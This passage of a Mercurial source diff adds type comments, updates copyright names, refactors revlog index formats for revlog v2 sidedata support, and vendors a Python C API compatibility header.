# ensure phase's sets are loaded phases = set(phases) @@ -457,6 +488,7 @@ self._loadedrevslen = len(cl) def loadphaserevs(self, repo): + # type: (localrepo.localrepository) -> None """ensure phase information is loaded in the object""" if self._phasesets is None: try: @@ -470,6 +502,7 @@ self._phasesets = None def phase(self, repo, rev): + # type: (localrepo.localrepository, int) -> int # We need a repo argument here to be able to build _phasesets # if necessary. The repository instance is not stored in # phasecache to avoid reference cycles. The changelog instance @@ -652,6 +685,7 @@ return False def filterunknown(self, repo): + # type: (localrepo.localrepository) -> None """remove unknown nodes from the phase boundary Nothing is lost as unknown nodes only hold data for their descendants. @@ -729,6 +763,7 @@ def listphases(repo): + # type: (localrepo.localrepository) -> Dict[bytes, bytes] """List phases root for serialization over pushkey""" # Use ordered dictionary so behavior is deterministic. keys = util.sortdict() @@ -760,6 +795,7 @@ def pushphase(repo, nhex, oldphasestr, newphasestr): + # type: (localrepo.localrepository, bytes, bytes, bytes) -> bool """List phases root for serialization over pushkey""" repo = repo.unfiltered() with repo.lock(): @@ -909,6 +945,7 @@ def newcommitphase(ui): + # type: (uimod.ui) -> int """helper to get the target phase of new commit Handle all possible values for the phases.new-commit options. @@ -924,11 +961,13 @@ def hassecret(repo): + # type: (localrepo.localrepository) -> bool """utility function that check if a repo have any secret changeset.""" return bool(repo._phasecache.phaseroots[secret]) def preparehookargs(node, old, new): + # type: (bytes, Optional[int], Optional[int]) -> Dict[bytes, bytes] if old is None: old = b'' else: diff --git a/mercurial/posix.py b/mercurial/posix.py --- a/mercurial/posix.py +++ b/mercurial/posix.py @@ -1,6 +1,6 @@ # posix.py - Posix utility function implementations for Mercurial # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/profiling.py b/mercurial/profiling.py --- a/mercurial/profiling.py +++ b/mercurial/profiling.py @@ -228,7 +228,7 @@ if self._output == b'blackbox': self._fp = util.stringio() elif self._output: - path = self._ui.expandpath(self._output) + path = util.expandpath(self._output) self._fp = open(path, b'wb') elif pycompat.iswindows: # parse escape sequence by win32print() diff --git a/mercurial/pure/bdiff.py b/mercurial/pure/bdiff.py --- a/mercurial/pure/bdiff.py +++ b/mercurial/pure/bdiff.py @@ -1,6 +1,6 @@ # bdiff.py - Python implementation of bdiff.c # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pure/charencode.py b/mercurial/pure/charencode.py --- a/mercurial/pure/charencode.py +++ b/mercurial/pure/charencode.py @@ -1,6 +1,6 @@ # charencode.py - miscellaneous character encoding # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pure/mpatch.py b/mercurial/pure/mpatch.py --- a/mercurial/pure/mpatch.py +++ b/mercurial/pure/mpatch.py @@ -1,6 +1,6 @@ # mpatch.py - Python implementation of mpatch.c # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pure/osutil.py b/mercurial/pure/osutil.py --- a/mercurial/pure/osutil.py +++ b/mercurial/pure/osutil.py @@ -1,6 +1,6 @@ # osutil.py - pure Python version of osutil.c # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -1,6 +1,6 @@ # parsers.py - Python implementation of parsers.c # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -17,6 +17,7 @@ ) from ..revlogutils import nodemap as nodemaputil +from ..revlogutils import constants as revlog_constants stringio = pycompat.bytesio @@ -33,13 +34,6 @@ return x -indexformatng = b">Qiiiiii20s12x" -indexfirst = struct.calcsize(b'Q') -sizeint = struct.calcsize(b'i') -indexsize = struct.calcsize(indexformatng) -nullitem = (0, 0, 0, -1, -1, -1, -1, nullid) - - def gettype(q): return int(q & 0xFFFF) @@ -49,6 +43,19 @@ class BaseIndexObject(object): + # Format of an index entry according to Python's `struct` language + index_format = revlog_constants.INDEX_ENTRY_V1 + # Size of a C unsigned long long int, platform independent + big_int_size = struct.calcsize(b'>Q') + # Size of a C long int, platform independent + int_size = struct.calcsize(b'>i') + # An empty index entry, used as a default value to be overridden, or nullrev + null_item = (0, 0, 0, -1, -1, -1, -1, nullid) + + @util.propertycache + def entry_size(self): + return self.index_format.size + @property def nodemap(self): msg = b"index.nodemap is deprecated, use index.[has_node|rev|get_rev]" @@ -94,7 +101,7 @@ def append(self, tup): if '_nodemap' in vars(self): self._nodemap[tup[7]] = len(self) - data = _pack(indexformatng, *tup) + data = self.index_format.pack(*tup) self._extra.append(data) def _check_index(self, i): @@ -105,14 +112,14 @@ def __getitem__(self, i): if i == -1: - return nullitem + return self.null_item self._check_index(i) if i >= self._lgt: data = self._extra[i - self._lgt] else: index = self._calculate_index(i) - data = self._data[index : index + indexsize] - r = _unpack(indexformatng, data) + data = self._data[index : index + self.entry_size] + r = self.index_format.unpack(data) if self._lgt and i == 0: r = (offset_type(0, gettype(r[0])),) + r[1:] return r @@ -120,13 +127,13 @@ class IndexObject(BaseIndexObject): def __init__(self, data): - assert len(data) % indexsize == 0 + assert len(data) % self.entry_size == 0 self._data = data - self._lgt = len(data) // indexsize + self._lgt = len(data) // self.entry_size self._extra = [] def _calculate_index(self, i): - return i * indexsize + return i * self.entry_size def __delitem__(self, i): if not isinstance(i, slice) or not i.stop == -1 or i.step is not None: @@ -135,7 +142,7 @@ self._check_index(i) self._stripnodes(i) if i < self._lgt: - self._data = self._data[: i * indexsize] + self._data = self._data[: i * self.entry_size] self._lgt = i self._extra = [] else: @@ -198,14 +205,16 @@ if lgt is not None: self._offsets = [0] * lgt count = 0 - while off <= len(self._data) - indexsize: + while off <= len(self._data) - self.entry_size: + start = off + self.big_int_size (s,) = struct.unpack( - b'>i', self._data[off + indexfirst : off + sizeint + indexfirst] + b'>i', + self._data[start : start + self.int_size], ) if lgt is not None: self._offsets[count] = off count += 1 - off += indexsize + s + off += self.entry_size + s if off != len(self._data): raise ValueError(b"corrupted data") return count @@ -227,10 +236,68 @@ return self._offsets[i] -def parse_index2(data, inline): +def parse_index2(data, inline, revlogv2=False): if not inline: - return IndexObject(data), None - return InlinedIndexObject(data, inline), (0, data) + cls = IndexObject2 if revlogv2 else IndexObject + return cls(data), None + cls = InlinedIndexObject2 if revlogv2 else InlinedIndexObject + return cls(data, inline), (0, data) + + +class Index2Mixin(object): + index_format = revlog_constants.INDEX_ENTRY_V2 + null_item = (0, 0, 0, -1, -1, -1, -1, nullid, 0, 0) + + def replace_sidedata_info(self, i, sidedata_offset, sidedata_length): + """ + Replace an existing index entry's sidedata offset and length with new + ones. + This cannot be used outside of the context of sidedata rewriting, + inside the transaction that creates the revision `i`. + """ + if i < 0: + raise KeyError + self._check_index(i) + sidedata_format = b">Qi" + packed_size = struct.calcsize(sidedata_format) + if i >= self._lgt: + packed = _pack(sidedata_format, sidedata_offset, sidedata_length) + old = self._extra[i - self._lgt] + new = old[:64] + packed + old[64 + packed_size :] + self._extra[i - self._lgt] = new + else: + msg = b"cannot rewrite entries outside of this transaction" + raise KeyError(msg) + + +class IndexObject2(Index2Mixin, IndexObject): + pass + + +class InlinedIndexObject2(Index2Mixin, InlinedIndexObject): + def _inline_scan(self, lgt): + sidedata_length_pos = 72 + off = 0 + if lgt is not None: + self._offsets = [0] * lgt + count = 0 + while off <= len(self._data) - self.entry_size: + start = off + self.big_int_size + (data_size,) = struct.unpack( + b'>i', + self._data[start : start + self.int_size], + ) + start = off + sidedata_length_pos + (side_data_size,) = struct.unpack( + b'>i', self._data[start : start + self.int_size] + ) + if lgt is not None: + self._offsets[count] = off + count += 1 + off += self.entry_size + data_size + side_data_size + if off != len(self._data): + raise ValueError(b"corrupted data") + return count def parse_index_devel_nodemap(data, inline): diff --git a/mercurial/pushkey.py b/mercurial/pushkey.py --- a/mercurial/pushkey.py +++ b/mercurial/pushkey.py @@ -1,6 +1,6 @@ # pushkey.py - dispatching for pushing and pulling keys # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pvec.py b/mercurial/pvec.py --- a/mercurial/pvec.py +++ b/mercurial/pvec.py @@ -1,6 +1,6 @@ # pvec.py - probabilistic vector clocks for Mercurial # -# Copyright 2012 Matt Mackall <mpm@selenic.com> +# Copyright 2012 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pythoncapi_compat.h b/mercurial/pythoncapi_compat.h new file mode 100644 --- /dev/null +++ b/mercurial/pythoncapi_compat.h @@ -0,0 +1,283 @@ +// Header file providing new functions of the Python C API to old Python +// versions. +// +// File distributed under the MIT license. +// +// Homepage: +// https://github.com/pythoncapi/pythoncapi_compat +// +// Latest version: +// https://raw.githubusercontent.com/pythoncapi/pythoncapi_compat/master/pythoncapi_compat.h + +#ifndef PYTHONCAPI_COMPAT +#define PYTHONCAPI_COMPAT + +#ifdef __cplusplus +extern "C" { +#endif + +#include <Python.h> +#include "frameobject.h" // PyFrameObject, PyFrame_GetBack() + + +/* VC 2008 doesn't know about the inline keyword. */ +#if defined(_MSC_VER) && _MSC_VER < 1900 +#define inline __forceinline +#endif + +// Cast argument to PyObject* type. +#ifndef _PyObject_CAST +# define _PyObject_CAST(op) ((PyObject*)(op)) +#endif + + +// bpo-42262 added Py_NewRef() to Python 3.10.0a3 +#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_NewRef) +static inline PyObject* _Py_NewRef(PyObject *obj) +{ + Py_INCREF(obj); + return obj; +} +#define Py_NewRef(obj) _Py_NewRef(_PyObject_CAST(obj)) +#endif + + +// bpo-42262 added Py_XNewRef() to Python 3.10.0a3 +#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_XNewRef) +static inline PyObject* _Py_XNewRef(PyObject *obj) +{ + Py_XINCREF(obj); + return obj; +} +#define Py_XNewRef(obj) _Py_XNewRef(_PyObject_CAST(obj)) +#endif + + +// bpo-39573 added Py_SET_REFCNT() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_REFCNT) +static inline void _Py_SET_REFCNT(PyObject *ob, Py_ssize_t refcnt) +{ + ob->ob_refcnt = refcnt; +} +#define Py_SET_REFCNT(ob, refcnt) _Py_SET_REFCNT((PyObject*)(ob), refcnt) +#endif + + +// bpo-39573 added Py_SET_TYPE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_TYPE) +static inline void +_Py_SET_TYPE(PyObject *ob, PyTypeObject *type) +{ + ob->ob_type = type; +} +#define Py_SET_TYPE(ob, type) _Py_SET_TYPE((PyObject*)(ob), type) +#endif + + +// bpo-39573 added Py_SET_SIZE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_SIZE) +static inline void +_Py_SET_SIZE(PyVarObject *ob, Py_ssize_t size) +{ + ob->ob_size = size; +} +#define Py_SET_SIZE(ob, size) _Py_SET_SIZE((PyVarObject*)(ob), size) +#endif + + +// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyCodeObject* +PyFrame_GetCode(PyFrameObject *frame) +{ + PyCodeObject *code; + assert(frame != NULL); + code = frame->f_code; + assert(code != NULL); + Py_INCREF(code); + return code; +} +#endif + +static inline PyCodeObject* +_PyFrame_GetCodeBorrow(PyFrameObject *frame) +{ + PyCodeObject *code = PyFrame_GetCode(frame); + Py_DECREF(code); + return code; // borrowed reference +} + + +// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyFrameObject* +PyFrame_GetBack(PyFrameObject *frame) +{ + PyFrameObject *back; + assert(frame != NULL); + back = frame->f_back; + Py_XINCREF(back); + return back; +} +#endif + +static inline PyFrameObject* +_PyFrame_GetBackBorrow(PyFrameObject *frame) +{ + PyFrameObject *back = PyFrame_GetBack(frame); + Py_XDECREF(back); + return back; // borrowed reference +} + + +// bpo-39947 added PyThreadState_GetInterpreter() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline PyInterpreterState * +PyThreadState_GetInterpreter(PyThreadState *tstate) +{ + assert(tstate != NULL); + return tstate->interp; +} +#endif + + +// bpo-40429 added PyThreadState_GetFrame() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyFrameObject* +PyThreadState_GetFrame(PyThreadState *tstate) +{ + PyFrameObject *frame; + assert(tstate != NULL); + frame = tstate->frame; + Py_XINCREF(frame); + return frame; +} +#endif + +static inline PyFrameObject* +_PyThreadState_GetFrameBorrow(PyThreadState *tstate) +{ + PyFrameObject *frame = PyThreadState_GetFrame(tstate); + Py_XDECREF(frame); + return frame; // borrowed reference +} + + +// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline PyInterpreterState * +PyInterpreterState_Get(void) +{ + PyThreadState *tstate; + PyInterpreterState *interp; + + tstate = PyThreadState_GET(); + if (tstate == NULL) { + Py_FatalError("GIL released (tstate is NULL)"); + } + interp = tstate->interp; + if (interp == NULL) { + Py_FatalError("no current interpreter"); + } + return interp; +} +#endif + + +// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a6 +#if 0x030700A1 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x030900A6 +static inline uint64_t +PyThreadState_GetID(PyThreadState *tstate) +{ + assert(tstate != NULL); + return tstate->id; +} +#endif + + +// bpo-37194 added PyObject_CallNoArgs() to Python 3.9.0a1 +#if PY_VERSION_HEX < 0x030900A1 +static inline PyObject* +PyObject_CallNoArgs(PyObject *func) +{ + return PyObject_CallFunctionObjArgs(func, NULL); +} +#endif + + +// bpo-39245 made PyObject_CallOneArg() public (previously called +// _PyObject_CallOneArg) in Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 +static inline PyObject* +PyObject_CallOneArg(PyObject *func, PyObject *arg) +{ + return PyObject_CallFunctionObjArgs(func, arg, NULL); +} +#endif + + +// bpo-40024 added PyModule_AddType() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline int +PyModule_AddType(PyObject *module, PyTypeObject *type) +{ + const char *name, *dot; + + if (PyType_Ready(type) < 0) { + return -1; + } + + // inline _PyType_Name() + name = type->tp_name; + assert(name != NULL); + dot = strrchr(name, '.'); + if (dot != NULL) { + name = dot + 1; + } + + Py_INCREF(type); + if (PyModule_AddObject(module, name, (PyObject *)type) < 0) { + Py_DECREF(type); + return -1; + } + + return 0; +} +#endif + + +// bpo-40241 added PyObject_GC_IsTracked() to Python 3.9.0a6. +// bpo-4688 added _PyObject_GC_IS_TRACKED() to Python 2.7.0a2. +#if PY_VERSION_HEX < 0x030900A6 +static inline int +PyObject_GC_IsTracked(PyObject* obj) +{ + return (PyObject_IS_GC(obj) && _PyObject_GC_IS_TRACKED(obj)); +} +#endif + +// bpo-40241 added PyObject_GC_IsFinalized() to Python 3.9.0a6. +// bpo-18112 added _PyGCHead_FINALIZED() to Python 3.4.0 final. +#if PY_VERSION_HEX < 0x030900A6 && PY_VERSION_HEX >= 0x030400F0 +static inline int +PyObject_GC_IsFinalized(PyObject *obj) +{ + return (PyObject_IS_GC(obj) && _PyGCHead_FINALIZED((PyGC_Head *)(obj)-1)); +} +#endif + + +// bpo-39573 added Py_IS_TYPE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_IS_TYPE) +static inline int +_Py_IS_TYPE(const PyObject *ob, const PyTypeObject *type) { + return ob->ob_type == type; +} +#define Py_IS_TYPE(ob, type) _Py_IS_TYPE((const PyObject*)(ob), type) +#endif + + +#ifdef __cplusplus +} +#endif +#endif // PYTHONCAPI_COMPAT diff --git a/mercurial/repair.py b/mercurial/repair.py --- a/mercurial/repair.py +++ b/mercurial/repair.py @@ -1,7 +1,7 @@ # repair.py - functions for repository repair for mercurial # # Copyright 2005, 2006 Chris Mason <mason@suse.com> -# Copyright 2007 Matt Mackall +# Copyright 2007 Olivia Mackall # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -28,11 +28,11 @@ pycompat, requirements, scmutil, - util, ) from .utils import ( hashutil, stringutil, + urlutil, ) @@ -245,7 +245,7 @@ tmpbundleurl = b'bundle:' + vfs.join(tmpbundlefile) txnname = b'strip' if not isinstance(gen, bundle2.unbundle20): - txnname = b"strip\n%s" % util.hidepassword(tmpbundleurl) + txnname = b"strip\n%s" % urlutil.hidepassword(tmpbundleurl) with repo.transaction(txnname) as tr: bundle2.applybundle( repo, gen, tr, source=b'strip', url=tmpbundleurl @@ -308,11 +308,12 @@ if not tostrip: return None - newbmtarget, updatebm = _bookmarkmovements(repo, tostrip) + backupfile = None if backup: node = tostrip[0] backupfile = _createstripbackup(repo, tostrip, node, topic) + newbmtarget, updatebm = _bookmarkmovements(repo, tostrip) with repo.transaction(b'strip') as tr: phases.retractboundary(repo, tr, phases.archived, tostrip) bmchanges = [(m, repo[newbmtarget].node()) for m in updatebm] @@ -427,7 +428,7 @@ if scmutil.istreemanifest(repo): # This logic is safe if treemanifest isn't enabled, but also # pointless, so we skip it if treemanifest isn't enabled. - for unencoded, encoded, size in repo.store.datafiles(): + for t, unencoded, encoded, size in repo.store.datafiles(): if unencoded.startswith(b'meta/') and unencoded.endswith( b'00manifest.i' ): @@ -442,7 +443,7 @@ """ repo = repo.unfiltered() - if b'fncache' not in repo.requirements: + if requirements.FNCACHE_REQUIREMENT not in repo.requirements: ui.warn( _( b'(not rebuilding fncache because repository does not ' diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -1,12 +1,17 @@ # requirements.py - objects and functions related to repository requirements # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. from __future__ import absolute_import +GENERALDELTA_REQUIREMENT = b'generaldelta' +DOTENCODE_REQUIREMENT = b'dotencode' +STORE_REQUIREMENT = b'store' +FNCACHE_REQUIREMENT = b'fncache' + # When narrowing is finalized and no longer subject to format changes, # we should move this to just "narrow" or similar. NARROW_REQUIREMENT = b'narrowhg-experimental' @@ -21,9 +26,11 @@ # Stores manifest in Tree structure TREEMANIFEST_REQUIREMENT = b'treemanifest' +REVLOGV1_REQUIREMENT = b'revlogv1' + # Increment the sub-version when the revlog v2 format changes to lock out old # clients. -REVLOGV2_REQUIREMENT = b'exp-revlogv2.1' +REVLOGV2_REQUIREMENT = b'exp-revlogv2.2' # A repository with the sparserevlog feature will have delta chains that # can spread over a larger span. Sparse reading cuts these large spans into diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -1,6 +1,6 @@ # revlog.py - storage back-end for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -13,6 +13,7 @@ from __future__ import absolute_import +import binascii import collections import contextlib import errno @@ -28,6 +29,7 @@ nullhex, nullid, nullrev, + sha1nodeconstants, short, wdirfilenodeids, wdirhex, @@ -39,6 +41,10 @@ from .revlogutils.constants import ( FLAG_GENERALDELTA, FLAG_INLINE_DATA, + INDEX_ENTRY_V0, + INDEX_ENTRY_V1, + INDEX_ENTRY_V2, + INDEX_HEADER, REVLOGV0, REVLOGV1, REVLOGV1_FLAGS, @@ -119,10 +125,10 @@ # Flag processors for REVIDX_ELLIPSIS. def ellipsisreadprocessor(rl, text): - return text, False, {} - - -def ellipsiswriteprocessor(rl, text, sidedata): + return text, False + + +def ellipsiswriteprocessor(rl, text): return text, False @@ -203,6 +209,7 @@ baserevisionsize = attr.ib() revision = attr.ib() delta = attr.ib() + sidedata = attr.ib() linknode = attr.ib(default=None) @@ -214,20 +221,9 @@ node = attr.ib(default=None) -# index v0: -# 4 bytes: offset -# 4 bytes: compressed length -# 4 bytes: base rev -# 4 bytes: link rev -# 20 bytes: parent 1 nodeid -# 20 bytes: parent 2 nodeid -# 20 bytes: nodeid -indexformatv0 = struct.Struct(b">4l20s20s20s") -indexformatv0_pack = indexformatv0.pack -indexformatv0_unpack = indexformatv0.unpack - - class revlogoldindex(list): + entry_size = INDEX_ENTRY_V0.size + @property def nodemap(self): msg = b"index.nodemap is deprecated, use index.[has_node|rev|get_rev]" @@ -279,11 +275,8 @@ class revlogoldio(object): - def __init__(self): - self.size = indexformatv0.size - def parseindex(self, data, inline): - s = self.size + s = INDEX_ENTRY_V0.size index = [] nodemap = nodemaputil.NodeMap({nullid: nullrev}) n = off = 0 @@ -291,7 +284,7 @@ while off + s <= l: cur = data[off : off + s] off += s - e = indexformatv0_unpack(cur) + e = INDEX_ENTRY_V0.unpack(cur) # transform to revlogv1 format e2 = ( offset_type(e[0], 0), @@ -311,6 +304,13 @@ return index, None def packentry(self, entry, node, version, rev): + """return the binary representation of an entry + + entry: a tuple containing all the values (see index.__getitem__) + node: a callback to convert a revision to nodeid + version: the changelog version + rev: the revision number + """ if gettype(entry[0]): raise error.RevlogError( _(b'index entry flags need revlog version 1') @@ -324,24 +324,8 @@ node(entry[6]), entry[7], ) - return indexformatv0_pack(*e2) - - -# index ng: -# 6 bytes: offset -# 2 bytes: flags -# 4 bytes: compressed length -# 4 bytes: uncompressed length -# 4 bytes: base rev -# 4 bytes: link rev -# 4 bytes: parent 1 rev -# 4 bytes: parent 2 rev -# 32 bytes: nodeid -indexformatng = struct.Struct(b">Qiiiiii20s12x") -indexformatng_pack = indexformatng.pack -versionformat = struct.Struct(b">I") -versionformat_pack = versionformat.pack -versionformat_unpack = versionformat.unpack + return INDEX_ENTRY_V0.pack(*e2) + # corresponds to uncompressed length of indexformatng (2 gigs, 4-byte # signed integer) @@ -349,18 +333,27 @@ class revlogio(object): - def __init__(self): - self.size = indexformatng.size - def parseindex(self, data, inline): # call the C implementation to parse the index data index, cache = parsers.parse_index2(data, inline) return index, cache def packentry(self, entry, node, version, rev): - p = indexformatng_pack(*entry) + p = INDEX_ENTRY_V1.pack(*entry) if rev == 0: - p = versionformat_pack(version) + p[4:] + p = INDEX_HEADER.pack(version) + p[4:] + return p + + +class revlogv2io(object): + def parseindex(self, data, inline): + index, cache = parsers.parse_index2(data, inline, revlogv2=True) + return index, cache + + def packentry(self, entry, node, version, rev): + p = INDEX_ENTRY_V2.pack(*entry) + if rev == 0: + p = INDEX_HEADER.pack(version) + p[4:] return p @@ -421,6 +414,11 @@ If `upperboundcomp` is not None, this is the expected maximal gain from compression for the data content. + + `concurrencychecker` is an optional function that receives 3 arguments: a + file handle, a filename, and an expected position. It should check whether + the current position in the file handle is valid, and log/warn/fail (by + raising). """ _flagserrorclass = error.RevlogError @@ -435,6 +433,7 @@ censorable=False, upperboundcomp=None, persistentnodemap=False, + concurrencychecker=None, ): """ create a revlog object @@ -448,14 +447,9 @@ self.datafile = datafile or (indexfile[:-2] + b".d") self.nodemap_file = None if persistentnodemap: - if indexfile.endswith(b'.a'): - pending_path = indexfile[:-4] + b".n.a" - if opener.exists(pending_path): - self.nodemap_file = pending_path - else: - self.nodemap_file = indexfile[:-4] + b".n" - else: - self.nodemap_file = indexfile[:-2] + b".n" + self.nodemap_file = nodemaputil.get_nodemap_file( + opener, self.indexfile + ) self.opener = opener # When True, indexfile is opened with checkambig=True at writing, to @@ -495,6 +489,8 @@ self._loadindex() + self._concurrencychecker = concurrencychecker + def _loadindex(self): mmapindexthreshold = None opts = self.opener.options @@ -531,8 +527,6 @@ if self._mmaplargeindex and b'mmapindexthreshold' in opts: mmapindexthreshold = opts[b'mmapindexthreshold'] self.hassidedata = bool(opts.get(b'side-data', False)) - if self.hassidedata: - self._flagprocessors[REVIDX_SIDEDATA] = sidedatautil.processors self._sparserevlog = bool(opts.get(b'sparse-revlog', False)) withsparseread = bool(opts.get(b'with-sparse-read', False)) # sparse-revlog forces sparse-read @@ -575,7 +569,7 @@ else: indexdata = f.read() if len(indexdata) > 0: - versionflags = versionformat_unpack(indexdata[:4])[0] + versionflags = INDEX_HEADER.unpack(indexdata[:4])[0] self._initempty = False else: versionflags = newversionflags @@ -617,7 +611,11 @@ % (flags >> 16, fmt, self.indexfile) ) - self._inline = versionflags & FLAG_INLINE_DATA + # There is a bug in the transaction handling when going from an + # inline revlog to a separate index and data file. Turn it off until + # it's fixed, since v2 revlogs sometimes get rewritten on exchange. + # See issue6485 + self._inline = False # generaldelta implied by version 2 revlogs. self._generaldelta = True @@ -625,6 +623,10 @@ raise error.RevlogError( _(b'unknown version (%d) in revlog %s') % (fmt, self.indexfile) ) + + self.nodeconstants = sha1nodeconstants + self.nullid = self.nodeconstants.nullid + # sparse-revlog can't be on without general-delta (issue6056) if not self._generaldelta: self._sparserevlog = False @@ -647,6 +649,8 @@ self._io = revlogio() if self.version == REVLOGV0: self._io = revlogoldio() + elif fmt == REVLOGV2: + self._io = revlogv2io() elif devel_nodemap: self._io = NodemapRevlogIO() elif use_rust_index: @@ -831,6 +835,11 @@ def length(self, rev): return self.index[rev][1] + def sidedata_length(self, rev): + if self.version & 0xFFFF != REVLOGV2: + return 0 + return self.index[rev][9] + def rawsize(self, rev): """return the length of the uncompressed text for a given revision""" l = self.index[rev][2] @@ -875,8 +884,10 @@ if rev == wdirrev: raise error.WdirUnsupported raise - - return entry[5], entry[6] + if entry[5] == nullrev: + return entry[6], entry[5] + else: + return entry[5], entry[6] # fast parentrevs(rev) where rev isn't filtered _uncheckedparentrevs = parentrevs @@ -897,7 +908,11 @@ def parents(self, node): i = self.index d = i[self.rev(node)] - return i[d[5]][7], i[d[6]][7] # map revisions to nodes inline + # inline node() to avoid function call overhead + if d[5] == nullid: + return i[d[6]][7], i[d[5]][7] + else: + return i[d[5]][7], i[d[6]][7] def chainlen(self, rev): return self._chaininfo(rev)[0] @@ -1694,8 +1709,8 @@ end = int(iend[0] >> 16) + iend[1] if self._inline: - start += (startrev + 1) * self._io.size - end += (endrev + 1) * self._io.size + start += (startrev + 1) * self.index.entry_size + end += (endrev + 1) * self.index.entry_size length = end - start return start, self._getsegment(start, length, df=df) @@ -1729,7 +1744,7 @@ start = self.start length = self.length inline = self._inline - iosize = self._io.size + iosize = self.index.entry_size buffer = util.buffer l = [] @@ -1828,7 +1843,7 @@ elif operation == b'read': return flagutil.processflagsread(self, text, flags) else: # write operation - return flagutil.processflagswrite(self, text, flags, None) + return flagutil.processflagswrite(self, text, flags) def revision(self, nodeorrev, _df=None, raw=False): """return an uncompressed revision of a given node or revision @@ -1873,10 +1888,17 @@ # revision or might need to be processed to retrieve the revision. rev, rawtext, validated = self._rawtext(node, rev, _df=_df) + if self.version & 0xFFFF == REVLOGV2: + if rev is None: + rev = self.rev(node) + sidedata = self._sidedata(rev) + else: + sidedata = {} + if raw and validated: # if we don't want to process the raw text and that raw # text is cached, we can exit early. - return rawtext, {} + return rawtext, sidedata if rev is None: rev = self.rev(node) # the revlog's flag for this revision @@ -1885,20 +1907,14 @@ if validated and flags == REVIDX_DEFAULT_FLAGS: # no extra flags set, no flag processor runs, text = rawtext - return rawtext, {} - - sidedata = {} + return rawtext, sidedata + if raw: validatehash = flagutil.processflagsraw(self, rawtext, flags) text = rawtext else: - try: - r = flagutil.processflagsread(self, rawtext, flags) - except error.SidedataHashError as exc: - msg = _(b"integrity check failed on %s:%s sidedata key %d") - msg %= (self.indexfile, pycompat.bytestr(rev), exc.sidedatakey) - raise error.RevlogError(msg) - text, validatehash, sidedata = r + r = flagutil.processflagsread(self, rawtext, flags) + text, validatehash = r if validatehash: self.checkhash(text, node, rev=rev) if not validated: @@ -1949,6 +1965,21 @@ del basetext # let us have a chance to free memory early return (rev, rawtext, False) + def _sidedata(self, rev): + """Return the sidedata for a given revision number.""" + index_entry = self.index[rev] + sidedata_offset = index_entry[8] + sidedata_size = index_entry[9] + + if self._inline: + sidedata_offset += self.index.entry_size * (1 + rev) + if sidedata_size == 0: + return {} + + segment = self._getsegment(sidedata_offset, sidedata_size) + sidedata = sidedatautil.deserialize_sidedata(segment) + return sidedata + def rawdata(self, nodeorrev, _df=None): """return an uncompressed raw data of a given node or revision number. @@ -2041,7 +2072,7 @@ # the temp file replace the real index when we exit the context # manager - tr.replace(self.indexfile, trindex * self._io.size) + tr.replace(self.indexfile, trindex * self.index.entry_size) nodemaputil.setup_persistent_nodemap(tr, self) self._chunkclear() @@ -2082,20 +2113,15 @@ if sidedata is None: sidedata = {} - flags = flags & ~REVIDX_SIDEDATA elif not self.hassidedata: raise error.ProgrammingError( _(b"trying to add sidedata to a revlog who don't support them") ) - else: - flags |= REVIDX_SIDEDATA if flags: node = 